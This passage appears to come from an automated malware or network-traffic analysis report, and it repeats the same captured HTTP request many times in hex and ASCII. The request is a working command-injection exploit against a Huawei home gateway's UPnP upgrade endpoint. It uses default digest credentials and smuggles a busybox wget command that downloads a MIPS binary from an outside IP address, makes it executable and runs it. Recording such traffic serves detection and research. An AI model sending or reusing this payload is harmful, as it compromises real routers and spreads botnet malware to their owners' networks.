/tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 